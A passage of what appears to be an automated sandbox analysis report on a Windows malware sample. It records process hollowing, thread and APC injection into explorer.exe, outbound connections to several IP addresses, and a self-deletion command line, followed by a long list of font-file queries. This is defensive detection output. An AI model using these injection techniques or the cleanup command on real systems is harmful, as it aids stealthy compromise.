          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05655BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05591B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05591B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05614257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05585210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05598A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.142.251 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.242 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 13B0000
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp, explorer.exe, 00000002.00000002.582295532.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000002.00000002.569152614.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.570010507.0000000001640000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.571905610.0000000003C90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Users\user\Desktop\zHgm9k7WYU.exe VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
